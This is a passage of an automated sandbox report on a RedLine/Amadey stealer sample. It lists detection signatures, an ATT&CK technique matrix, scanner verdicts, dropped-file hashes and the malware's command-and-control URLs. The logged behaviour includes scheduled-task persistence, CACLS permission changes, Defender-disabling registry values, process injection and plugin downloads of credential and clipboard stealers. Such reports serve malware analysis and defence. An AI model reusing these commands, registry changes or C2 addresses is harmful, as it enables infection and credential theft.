                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050092B mov eax, dword ptr fs:[00000030h]2_2_0050092B
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00500D90 mov eax, dword ptr fs:[00000030h]2_2_00500D90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138A9A1 mov eax, dword ptr fs:[00000030h]8_2_0138A9A1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138CFB2 mov eax, dword ptr fs:[00000030h]8_2_0138CFB2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6F40 SetUnhandledExceptionFilter,0_2_010E6F40
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_010E6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A76F40 SetUnhandledExceptionFilter,1_2_00A76F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A76CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A76CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0050D070
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0050E883
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005171D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_005171D1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00512658 SetUnhandledExceptionFilter,2_2_00512658
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387A74 SetUnhandledExceptionFilter,8_2_01387A74
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0138790F
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0138BB20
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_01387208

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_013738C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,8_2_013738C0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_010E18A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: GetLocaleInfoA,2_2_00417A20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: GetLocaleInfoA,2_2_00517C87
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387AFC cpuid 8_2_01387AFC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_010E7155
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01393C76 _free,_free,_free,GetTimeZoneInformation,_free,8_2_01393C76
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F96A8 GetUserNameA,2_2_022F96A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_010E2BFB

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 9.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.xriv.exe.1370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.xriv.exe.1370000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.532fa20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.3.file.exe.532fa20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.mnolyk.exe.d50000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000000.531737560.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.450697685.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.531952699.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.786833097.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.787454951.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.658223943.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000000.444881236.0000000001371000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834330424.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.451269241.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 3136, type: MEMORYSTR
                            Source: Yara matchFile source: 21.2.rundll32.exe.6f460000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll, type: DROPPED

                            Remote Access Functionality

                            Source: Yara matchFile source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                            Valid Accounts3
                            Native API
                            1
                            Windows Service
                            2
                            Bypass User Access Control
                            21
                            Disable or Modify Tools
                            OS Credential Dumping2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            Exfiltration Over Other Network Medium14
                            Ingress Tool Transfer
                            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts2
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            1
                            Access Token Manipulation
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            Account Discovery
                            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                            Encrypted Channel
                            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts1
                            Scheduled Task/Job
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Windows Service
                            2
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                            Non-Application Layer Protocol
                            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution
                            1
                            Services File Permissions Weakness
                            111
                            Process Injection
                            2
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureScheduled Transfer113
                            Application Layer Protocol
                            SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets131
                            Security Software Discovery
                            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.common1
                            Registry Run Keys / Startup Folder
                            2
                            Bypass User Access Control
                            Cached Domain Credentials31
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup Items1
                            Services File Permissions Weakness
                            1
                            Masquerading
                            DCSync2
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            System Owner/User Discovery
                            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                            Process Injection
                            Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                            Services File Permissions Weakness
                            Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                            Rundll32
                            KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                            [Behavior graph: ID 801767, Sample: file.exe, Start date: 08/02/2023, Architecture: WINDOWS, Score: 100]

                            Source | Detection | Scanner | Label | Link
                            file.exe | 69% | ReversingLabs | Win32.Spyware.RedLine
                            file.exe | 53% | Virustotal | | Browse
                            file.exe | 100% | Joe Sandbox ML
                            Source | Detection | Scanner | Label | Link
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 100% | Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll | 81% | ReversingLabs | Win32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe | 51% | ReversingLabs | Win32.Trojan.Tedy
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe | 36% | ReversingLabs | Win32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler
                            C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 81% | ReversingLabs | Win32.Trojan.Amadey
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label | Link
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | 0% | URL Reputation | safe
                            http://62.204.41.4/Gol478Ns/index.php342a2 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Golol478Ns/index.php | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpY&e | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll7 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.php:dA | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | 100% | URL Reputation | malware
                            62.204.41.4/Gol478Ns/index.php | 100% | URL Reputation | malware
                            http://62.204.41.4/Gol478Ns/index.php2p | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.php | 100% | URL Reputation | malware
                            http://62.204.41.4/Gol478Ns/index.php1FJe | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpdW | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpPe | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpe5342a2 | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phprundll32.exe | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/index.phpq | 0% | Avira URL Cloud | safe
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dllE | 0% | Avira URL Cloud | safe
                            No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | true | URL Reputation: safe | unknown
                            http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | true | URL Reputation: malware | unknown
                            62.204.41.4/Gol478Ns/index.php | true | URL Reputation: malware | low
                            http://62.204.41.4/Gol478Ns/index.php | true | URL Reputation: malware | unknown
                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            62.204.41.4 | unknown | United Kingdom | | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                            IP
                            192.168.2.1
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:801767
                            Start date and time:2023-02-08 17:35:21 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 49s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@37/14@0/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 41% (good quality ratio 39.3%)
                            • Quality average: 85%
                            • Quality standard deviation: 24.3%
                            HCA Information:
                            • Successful, ratio: 93%
                            • Number of executed functions: 99
                            • Number of non-executed functions: 140
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                            • Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            Time | Type | Description
                            17:37:23 | Task Scheduler | Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            17:37:23 | API Interceptor | 2150x Sleep call for process: mnolyk.exe modified
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            62.204.41.4 | file.exe | Get hash | malicious | Browse | 62.204.41.4/Gol478Ns/index.php
                            No context
                            Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                            TNNET-ASTNNetOyMainnetworkFI | file.exe | Get hash | malicious | Browse | 62.204.41.4
                            TNNET-ASTNNetOyMainnetworkFI | file.exe | Get hash | malicious | Browse | 62.204.41.125
                            No context
                            No context
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):226
                            Entropy (8bit):5.354940450065058
                            Encrypted:false
                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                            MD5:B10E37251C5B495643F331DB2EEC3394
                            SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                            SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                            SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                            Malicious:false
                            Reputation:unknown
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):321
                            Entropy (8bit):5.355221377978991
                            Encrypted:false
                            SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                            MD5:03C5BA5FCE7124B503EA65EF522177C3
                            SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                            SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                            SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                            Malicious:false
                            Reputation:unknown
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                            Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):91136
                            Entropy (8bit):6.3469756750979025
                            Encrypted:false
                            SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                            MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                            SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                            SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll, Author: Joe Security
                            Antivirus:
